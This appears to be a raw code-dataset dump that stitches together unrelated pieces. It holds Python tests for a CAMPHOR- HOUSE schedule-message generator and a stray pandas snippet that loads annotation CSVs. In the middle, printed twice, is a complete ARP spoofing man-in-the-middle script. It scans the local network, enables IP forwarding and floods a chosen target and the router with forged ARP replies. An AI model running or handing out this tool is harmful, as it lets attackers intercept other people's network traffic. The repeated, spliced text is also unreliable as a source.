with pytest.raises(ValueError):
mg.generate_messages()
def test_generate_week_message_with_open(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 1, 17, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Open")
mg = app.MessageGenerator(
events=[e0, e1],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
04/01 (月) 17:00〜19:00
04/03 (水) 17:00〜19:00
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_week_message_with_open_and_make(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 1, 17, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Open")
e2 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Make")
mg = app.MessageGenerator(
events=[e0, e1, e2],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
04/01 (月) 17:00〜19:00
04/03 (水) 17:00〜19:00 (Make)
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
e0 = app.Event(
start=datetime(2021, 8, 2, 17, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2021, 8, 2, 18, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Make")
e2 = app.Event(
start=datetime(2021, 8, 5, 17, tzinfo=tz),
end=datetime(2021, 8, 5, 19, tzinfo=tz),
url=None,
title="Open")
mg = app.MessageGenerator(
events=[e0, e1, e2],
now=datetime(2021, 8, 2, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
08/02 (月) 17:00〜19:00 (Make)
08/05 (木) 17:00〜19:00
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_week_message_with_online_open(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2020, 4, 1, 17, tzinfo=tz),
end=datetime(2020, 4, 1, 19, tzinfo=tz),
url=None,
title="Online Open")
e1 = app.Event(
start=datetime(2020, 4, 3, 17, tzinfo=tz),
end=datetime(2020, 4, 3, 19, tzinfo=tz),
url=None,
title="Online Open")
mg = app.MessageGenerator(
events=[e0, e1],
now=datetime(2020, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週のオンライン開館日です!
04/01 (水) 17:00〜19:00
04/03 (金) 17:00〜19:00
詳しくはCAMPHOR-のSlackをご覧ください!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_week_message_with_event(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 2, 17, tzinfo=tz),
end=datetime(2019, 4, 2, 19, tzinfo=tz),
url=None,
title="Python Event")
mg = app.MessageGenerator(
events=[e0],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent("""\
今週のイベント情報です!
Python Event 04/02 (火) 17:00〜19:00
お申し込みの上ご参加ください。
みなさんのお越しをお待ちしています!!""")]
def test_generate_week_message_with_nothing(self):
tz = pytz.timezone("Asia/Tokyo")
mg = app.MessageGenerator(
events=[],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == []
def test_generate_week_message_with_event_and_open(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 2, 17, tzinfo=tz),
end=datetime(2019, 4, 2, 19, tzinfo=tz),
url='https://example.com/',
title="Python Event")
e1 = app.Event(
start=datetime(2019, 4, 1, 17, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Open")
e2 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Open")
mg = app.MessageGenerator(
events=[e0, e1, e2],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
04/01 (月) 17:00〜19:00
04/03 (水) 17:00〜19:00
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}"""),
textwrap.dedent("""\
今週のイベント情報です!
Python Event 04/02 (火) 17:00〜19:00
https://example.com/
お申し込みの上ご参加ください。
みなさんのお越しをお待ちしています!!""")]
def test_generate_week_message_with_event_open_and_make(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 2, 17, tzinfo=tz),
end=datetime(2019, 4, 2, 19, tzinfo=tz),
url='https://example.com/',
title="Python Event")
e1 = app.Event(
start=datetime(2019, 4, 1, 17, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Open")
e2 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Open")
e3 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Make")
mg = app.MessageGenerator(
events=[e0, e1, e2, e3],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
04/01 (月) 17:00〜19:00
04/03 (水) 17:00〜19:00 (Make)
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}"""),
textwrap.dedent("""\
今週のイベント情報です!
Python Event 04/02 (火) 17:00〜19:00
https://example.com/
お申し込みの上ご参加ください。
みなさんのお越しをお待ちしています!!""")]
def test_generate_week_message_with_event_open_make_and_online_open(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 2, 17, tzinfo=tz),
end=datetime(2019, 4, 2, 19, tzinfo=tz),
url='https://example.com/',
title="Python Event")
e1 = app.Event(
start=datetime(2019, 4, 1, 17, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Open")
e2 = app.Event(
start=datetime(2019, 4, 1, 18, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Make")
e3 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Open")
e4 = app.Event(
start=datetime(2019, 4, 4, 17, tzinfo=tz),
end=datetime(2019, 4, 4, 19, tzinfo=tz),
url=None,
title="Online Open")
mg = app.MessageGenerator(
events=[e0, e1, e2, e3, e4],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
04/01 (月) 17:00〜19:00 (Make)
04/03 (水) 17:00〜19:00
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}"""),
textwrap.dedent(f"""\
今週のオンライン開館日です!
04/04 (木) 17:00〜19:00
詳しくはCAMPHOR-のSlackをご覧ください!!
その他の開館日はこちら
{SCHEDULE_LINK}"""),
textwrap.dedent("""\
今週のイベント情報です!
Python Event 04/02 (火) 17:00〜19:00
https://example.com/
お申し込みの上ご参加ください。
みなさんのお越しをお待ちしています!!""")] | tests/test_app.py | from datetime import datetime
import pytest
import pytz
import textwrap
import app
SCHEDULE_LINK = 'https://camph.net/schedule/'
class TestEvent:
def test_from_json(self):
tz = pytz.timezone("Asia/Tokyo")
d = {
"start": "2015-11-02T17:00:00+09:00",
"end": "2015-11-02T20:00:00+09:00",
"url": "https://example.com/",
"title": "Open"
}
e = app.Event.from_json(d)
assert e.start == tz.localize(datetime(2015, 11, 2, 17, 0, 0))
assert e.end == tz.localize(datetime(2015, 11, 2, 20, 0, 0))
assert e.title == "Open"
assert e.url == "https://example.com/"
d = {
"start": "2015-11-02T17:00:00+09:00",
"end": "2015-11-02T20:00:00+09:00",
"url": None,
"title": "Open"
}
e = app.Event.from_json(d)
assert e.start == tz.localize(datetime(2015, 11, 2, 17, 0, 0))
assert e.end == tz.localize(datetime(2015, 11, 2, 20, 0, 0))
assert e.title == "Open"
assert e.url is None
def test_from_json_where_time_is_invalid(self):
d = {
"start": "ABCDEF",
"end": "GHIJK",
"url": None,
"title": "Open"
}
with pytest.raises(ValueError):
app.Event.from_json(d)
def test_from_json_where_json_has_missing_key(self):
d = {
"title": "Open"
}
# TODO: we should raise more appropriate exception?
with pytest.raises(KeyError):
app.Event.from_json(d)
def test_generate_day_messages_with_open(self):
tz = pytz.timezone("Asia/Tokyo")
e = app.Event(
start=datetime(2017, 3, 3, 15, tzinfo=tz),
end=datetime(2017, 3, 3, 19, tzinfo=tz),
url=None,
title="Open")
mg = app.MessageGenerator(
events=[e],
now=datetime(2017, 3, 3, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE の開館時間は15:00〜19:00です。
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_day_messages_with_open_and_make(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2021, 8, 2, 15, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2021, 8, 2, 15, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Make")
mg = app.MessageGenerator(
events=[e0, e1],
now=datetime(2021, 8, 2, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE の開館時間は15:00〜19:00です。
CAMPHOR- Make も利用できます。
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
e0 = app.Event(
start=datetime(2021, 8, 2, 15, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2021, 8, 2, 16, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Make")
mg = app.MessageGenerator(
events=[e0, e1],
now=datetime(2021, 8, 2, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE の開館時間は15:00〜19:00です。
CAMPHOR- Make は16:00〜19:00に利用できます。
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_day_messages_with_online_open(self):
tz = pytz.timezone("Asia/Tokyo")
e = app.Event(
start=datetime(2020, 4, 12, 15, tzinfo=tz),
end=datetime(2020, 4, 12, 19, tzinfo=tz),
url=None,
title="Online Open")
mg = app.MessageGenerator(
events=[e],
now=datetime(2020, 4, 12, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE のオンライン開館時間は15:00〜19:00です。
詳しくはCAMPHOR-のSlackをご覧ください!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_day_messages_with_event(self):
tz = pytz.timezone("Asia/Tokyo")
e = app.Event(
start=datetime(2017, 3, 3, 17, tzinfo=tz),
end=datetime(2017, 3, 3, 19, tzinfo=tz),
url="https://example.com/",
title="Python Event")
mg = app.MessageGenerator(
events=[e],
now=datetime(2017, 3, 3, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent("""\
「Python Event」を17:00〜19:00に開催します!
みなさんのお越しをお待ちしています!!
https://example.com/""")]
e = app.Event(
start=datetime(2017, 3, 3, 17, tzinfo=tz),
end=datetime(2017, 3, 3, 19, tzinfo=tz),
url=None,
title="Python Event")
mg = app.MessageGenerator(
events=[e],
now=datetime(2017, 3, 3, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent("""\
「Python Event」を17:00〜19:00に開催します!
みなさんのお越しをお待ちしています!!""")]
def test_generate_day_messages_with_open_make_and_online_open(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2021, 8, 7, 17, tzinfo=tz),
end=datetime(2021, 8, 7, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2021, 8, 7, 18, tzinfo=tz),
end=datetime(2021, 8, 7, 19, tzinfo=tz),
url=None,
title="Make")
e2 = app.Event(
start=datetime(2021, 8, 7, 21, tzinfo=tz),
end=datetime(2021, 8, 7, 23, tzinfo=tz),
url=None,
title="Online Open")
mg = app.MessageGenerator(
events=[e0, e1, e2],
now=datetime(2021, 8, 7, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE の開館時間は17:00〜19:00です。
CAMPHOR- Make は18:00〜19:00に利用できます。
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}"""),
textwrap.dedent(f"""\
本日の CAMPHOR- HOUSE のオンライン開館時間は21:00〜23:00です。
詳しくはCAMPHOR-のSlackをご覧ください!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_day_message_where_title_is_missing(self):
tz = pytz.timezone("Asia/Tokyo")
e = app.Event(
start=datetime(2017, 3, 3, 17, tzinfo=tz),
end=datetime(2017, 3, 3, 19, tzinfo=tz),
url=None,
title="")
mg = app.MessageGenerator(
events=[e],
now=datetime(2017, 3, 3, 10, tzinfo=tz),
week=False)
message = mg.generate_messages()
assert message == []
def test_generate_day_message_where_duplicate_events(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2021, 8, 7, 17, tzinfo=tz),
end=datetime(2021, 8, 7, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2021, 8, 7, 18, tzinfo=tz),
end=datetime(2021, 8, 7, 19, tzinfo=tz),
url=None,
title="Open")
mg = app.MessageGenerator(
events=[e0, e1],
now=datetime(2021, 8, 7, 10, tzinfo=tz),
week=False)
with pytest.raises(ValueError):
mg.generate_messages()
def test_generate_week_message_with_open(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 1, 17, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Open")
mg = app.MessageGenerator(
events=[e0, e1],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
04/01 (月) 17:00〜19:00
04/03 (水) 17:00〜19:00
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_week_message_with_open_and_make(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 1, 17, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Open")
e2 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Make")
mg = app.MessageGenerator(
events=[e0, e1, e2],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
04/01 (月) 17:00〜19:00
04/03 (水) 17:00〜19:00 (Make)
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
e0 = app.Event(
start=datetime(2021, 8, 2, 17, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Open")
e1 = app.Event(
start=datetime(2021, 8, 2, 18, tzinfo=tz),
end=datetime(2021, 8, 2, 19, tzinfo=tz),
url=None,
title="Make")
e2 = app.Event(
start=datetime(2021, 8, 5, 17, tzinfo=tz),
end=datetime(2021, 8, 5, 19, tzinfo=tz),
url=None,
title="Open")
mg = app.MessageGenerator(
events=[e0, e1, e2],
now=datetime(2021, 8, 2, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
08/02 (月) 17:00〜19:00 (Make)
08/05 (木) 17:00〜19:00
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_week_message_with_online_open(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2020, 4, 1, 17, tzinfo=tz),
end=datetime(2020, 4, 1, 19, tzinfo=tz),
url=None,
title="Online Open")
e1 = app.Event(
start=datetime(2020, 4, 3, 17, tzinfo=tz),
end=datetime(2020, 4, 3, 19, tzinfo=tz),
url=None,
title="Online Open")
mg = app.MessageGenerator(
events=[e0, e1],
now=datetime(2020, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週のオンライン開館日です!
04/01 (水) 17:00〜19:00
04/03 (金) 17:00〜19:00
詳しくはCAMPHOR-のSlackをご覧ください!!
その他の開館日はこちら
{SCHEDULE_LINK}""")]
def test_generate_week_message_with_event(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 2, 17, tzinfo=tz),
end=datetime(2019, 4, 2, 19, tzinfo=tz),
url=None,
title="Python Event")
mg = app.MessageGenerator(
events=[e0],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent("""\
今週のイベント情報です!
Python Event 04/02 (火) 17:00〜19:00
お申し込みの上ご参加ください。
みなさんのお越しをお待ちしています!!""")]
def test_generate_week_message_with_nothing(self):
tz = pytz.timezone("Asia/Tokyo")
mg = app.MessageGenerator(
events=[],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == []
def test_generate_week_message_with_event_and_open(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 2, 17, tzinfo=tz),
end=datetime(2019, 4, 2, 19, tzinfo=tz),
url='https://example.com/',
title="Python Event")
e1 = app.Event(
start=datetime(2019, 4, 1, 17, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Open")
e2 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Open")
mg = app.MessageGenerator(
events=[e0, e1, e2],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
04/01 (月) 17:00〜19:00
04/03 (水) 17:00〜19:00
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}"""),
textwrap.dedent("""\
今週のイベント情報です!
Python Event 04/02 (火) 17:00〜19:00
https://example.com/
お申し込みの上ご参加ください。
みなさんのお越しをお待ちしています!!""")]
def test_generate_week_message_with_event_open_and_make(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 2, 17, tzinfo=tz),
end=datetime(2019, 4, 2, 19, tzinfo=tz),
url='https://example.com/',
title="Python Event")
e1 = app.Event(
start=datetime(2019, 4, 1, 17, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Open")
e2 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Open")
e3 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Make")
mg = app.MessageGenerator(
events=[e0, e1, e2, e3],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
04/01 (月) 17:00〜19:00
04/03 (水) 17:00〜19:00 (Make)
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}"""),
textwrap.dedent("""\
今週のイベント情報です!
Python Event 04/02 (火) 17:00〜19:00
https://example.com/
お申し込みの上ご参加ください。
みなさんのお越しをお待ちしています!!""")]
def test_generate_week_message_with_event_open_make_and_online_open(self):
tz = pytz.timezone("Asia/Tokyo")
e0 = app.Event(
start=datetime(2019, 4, 2, 17, tzinfo=tz),
end=datetime(2019, 4, 2, 19, tzinfo=tz),
url='https://example.com/',
title="Python Event")
e1 = app.Event(
start=datetime(2019, 4, 1, 17, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Open")
e2 = app.Event(
start=datetime(2019, 4, 1, 18, tzinfo=tz),
end=datetime(2019, 4, 1, 19, tzinfo=tz),
url=None,
title="Make")
e3 = app.Event(
start=datetime(2019, 4, 3, 17, tzinfo=tz),
end=datetime(2019, 4, 3, 19, tzinfo=tz),
url=None,
title="Open")
e4 = app.Event(
start=datetime(2019, 4, 4, 17, tzinfo=tz),
end=datetime(2019, 4, 4, 19, tzinfo=tz),
url=None,
title="Online Open")
mg = app.MessageGenerator(
events=[e0, e1, e2, e3, e4],
now=datetime(2019, 4, 1, 10, tzinfo=tz),
week=True)
message = mg.generate_messages()
assert message == [textwrap.dedent(f"""\
今週の開館日です!
04/01 (月) 17:00〜19:00 (Make)
04/03 (水) 17:00〜19:00
みなさんのお越しをお待ちしています!!
その他の開館日はこちら
{SCHEDULE_LINK}"""),
textwrap.dedent(f"""\
今週のオンライン開館日です!
04/04 (木) 17:00〜19:00
詳しくはCAMPHOR-のSlackをご覧ください!!
その他の開館日はこちら
{SCHEDULE_LINK}"""),
textwrap.dedent("""\
今週のイベント情報です!
Python Event 04/02 (火) 17:00〜19:00
https://example.com/
お申し込みの上ご参加ください。
みなさんのお越しをお待ちしています!!""")] | 0.33231 | 0.5526 |
import setup
import scapy.all as scapy
import subprocess
import re
import time
def greet():
subprocess.call(["clear"])
print("ARP Spoofer 0.01 [MITM] by Ravehorn\n")
def ifconfig():
print("Running ifconfig:\n")
subprocess.call(["ifconfig"])
interface = input("Interface -> ")
print("\n")
interface_info = str(subprocess.check_output(["ifconfig", interface]))
my_ip = str(re.findall(r"inet\s\w*\.\w*\.\w*\.\w*", interface_info))
my_ip = re.findall(r"\w*\.\w*\.\w*\.\w*", my_ip)
my_ip = my_ip[0]
scan_range = re.findall(r"\w*\.\w*\.\w*\.", my_ip)
scan_range = scan_range[0]
router_ip = scan_range + "1"
scan_range += "1/24"
return interface, my_ip, scan_range, router_ip
def arping(scan_range, router_ip):
print("Specify range to scan -> " + scan_range)
print("\n")
ans, _ = scapy.srp(scapy.Ether(dst="ff:ff:ff:ff:ff:ff")/scapy.ARP(pdst=scan_range), timeout=2)
ans = list(ans)
answered = {}
for entry in ans:
entry = str(entry)
pdst = re.findall(r"pdst=\w*\.\w*\.\w*\.\w*", entry)
pdst = re.findall(r"\w*\.\w*\.\w*\.\w*", str(pdst))
pdst = pdst[0]
hwsrc = re.findall(r"hwsrc=\w*:\w*:\w*:\w*:\w*:\w*", entry)
hwsrc = re.findall(r"\w*:\w*:\w*:\w*:\w*:\w*", str(hwsrc))
hwsrc = hwsrc[0]
answered[pdst] = hwsrc
for pair in answered.items():
print(pair)
router_mac = answered[router_ip]
print("\n")
return router_mac, answered
def select(my_ip, router_ip, router_mac, answered):
print("Your IP -> " + my_ip)
print("Router IP -> " + router_ip)
print("Router MAC -> " + router_mac)
target_ip = input("Target IP -> ")
target_mac = answered[target_ip]
print("Target MAC -> " + target_mac)
return target_mac, target_ip
def port_forwarding():
print("\nEnabling PF:")
subprocess.call("echo 1 > /proc/sys/net/ipv4/ip_forward", shell=True)
print("Done.\n")
def create_packets(mode, target_ip, target_mac, router_ip, router_mac):
if mode == "spoof":
target_packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=router_ip)
router_packet = scapy.ARP(op=2, pdst=router_ip, hwdst=router_mac, psrc=target_ip)
elif mode == "restore":
target_packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=router_ip, hwsrc=router_mac)
router_packet = scapy.ARP(op=2, pdst=router_ip, hwdst=router_mac, psrc=target_ip, hwsrc=target_mac)
return target_packet, router_packet
def spoof(target_packet, router_packet, target_ip, target_mac, router_ip, router_mac):
print("Spoofing:")
try:
packets_count = 0
while True:
scapy.send(target_packet, verbose=False)
scapy.send(router_packet, verbose=False)
packets_count += 2
print("\r[+] Packets sent: " + str(packets_count), end="")
time.sleep(2)
except KeyboardInterrupt:
print("\n")
target_packet, router_packet = create_packets("restore", target_ip, target_mac, router_ip, router_mac)
restore(target_packet, router_packet)
print("Quitting.")
def restore(target_packet, router_packet):
scapy.send(target_packet, verbose=False)
scapy.send(router_packet, verbose=False)
print("Normal connection restored.")
greet()
interface, my_ip, scan_range, router_ip = ifconfig()
router_mac, answered = arping(scan_range, router_ip)
target_mac, target_ip = select(my_ip, router_ip, router_mac, answered)
port_forwarding()
target_packet, router_packet = create_packets("spoof", target_ip, target_mac, router_ip, router_mac)
spoof(target_packet, router_packet, target_ip, target_mac, router_ip, router_mac) | arp_spoof.py | import setup
import scapy.all as scapy
import subprocess
import re
import time
def greet():
subprocess.call(["clear"])
print("ARP Spoofer 0.01 [MITM] by Ravehorn\n")
def ifconfig():
print("Running ifconfig:\n")
subprocess.call(["ifconfig"])
interface = input("Interface -> ")
print("\n")
interface_info = str(subprocess.check_output(["ifconfig", interface]))
my_ip = str(re.findall(r"inet\s\w*\.\w*\.\w*\.\w*", interface_info))
my_ip = re.findall(r"\w*\.\w*\.\w*\.\w*", my_ip)
my_ip = my_ip[0]
scan_range = re.findall(r"\w*\.\w*\.\w*\.", my_ip)
scan_range = scan_range[0]
router_ip = scan_range + "1"
scan_range += "1/24"
return interface, my_ip, scan_range, router_ip
def arping(scan_range, router_ip):
print("Specify range to scan -> " + scan_range)
print("\n")
ans, _ = scapy.srp(scapy.Ether(dst="ff:ff:ff:ff:ff:ff")/scapy.ARP(pdst=scan_range), timeout=2)
ans = list(ans)
answered = {}
for entry in ans:
entry = str(entry)
pdst = re.findall(r"pdst=\w*\.\w*\.\w*\.\w*", entry)
pdst = re.findall(r"\w*\.\w*\.\w*\.\w*", str(pdst))
pdst = pdst[0]
hwsrc = re.findall(r"hwsrc=\w*:\w*:\w*:\w*:\w*:\w*", entry)
hwsrc = re.findall(r"\w*:\w*:\w*:\w*:\w*:\w*", str(hwsrc))
hwsrc = hwsrc[0]
answered[pdst] = hwsrc
for pair in answered.items():
print(pair)
router_mac = answered[router_ip]
print("\n")
return router_mac, answered
def select(my_ip, router_ip, router_mac, answered):
print("Your IP -> " + my_ip)
print("Router IP -> " + router_ip)
print("Router MAC -> " + router_mac)
target_ip = input("Target IP -> ")
target_mac = answered[target_ip]
print("Target MAC -> " + target_mac)
return target_mac, target_ip
def port_forwarding():
print("\nEnabling PF:")
subprocess.call("echo 1 > /proc/sys/net/ipv4/ip_forward", shell=True)
print("Done.\n")
def create_packets(mode, target_ip, target_mac, router_ip, router_mac):
if mode == "spoof":
target_packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=router_ip)
router_packet = scapy.ARP(op=2, pdst=router_ip, hwdst=router_mac, psrc=target_ip)
elif mode == "restore":
target_packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=router_ip, hwsrc=router_mac)
router_packet = scapy.ARP(op=2, pdst=router_ip, hwdst=router_mac, psrc=target_ip, hwsrc=target_mac)
return target_packet, router_packet
def spoof(target_packet, router_packet, target_ip, target_mac, router_ip, router_mac):
print("Spoofing:")
try:
packets_count = 0
while True:
scapy.send(target_packet, verbose=False)
scapy.send(router_packet, verbose=False)
packets_count += 2
print("\r[+] Packets sent: " + str(packets_count), end="")
time.sleep(2)
except KeyboardInterrupt:
print("\n")
target_packet, router_packet = create_packets("restore", target_ip, target_mac, router_ip, router_mac)
restore(target_packet, router_packet)
print("Quitting.")
def restore(target_packet, router_packet):
scapy.send(target_packet, verbose=False)
scapy.send(router_packet, verbose=False)
print("Normal connection restored.")
greet()
interface, my_ip, scan_range, router_ip = ifconfig()
router_mac, answered = arping(scan_range, router_ip)
target_mac, target_ip = select(my_ip, router_ip, router_mac, answered)
port_forwarding()
target_packet, router_packet = create_packets("spoof", target_ip, target_mac, router_ip, router_mac)
spoof(target_packet, router_packet, target_ip, target_mac, router_ip, router_mac) | 0.209389 | 0.093471 |
from tqdm import tqdm
import pandas as pd
import numpy as np
import os
os.chdir("/media/data/bderinbay/rvc_devkit/datasets/json_file/")
df_cats = pd.read_csv('categories.csv')
df_images = pd.read_csv('images.csv')
df_anno = pd.read_csv('annotations.csv')
sample_columns = ['image_id','bbox','category_id', 'category_name', 'file_name', 'height', 'width','ds_id']
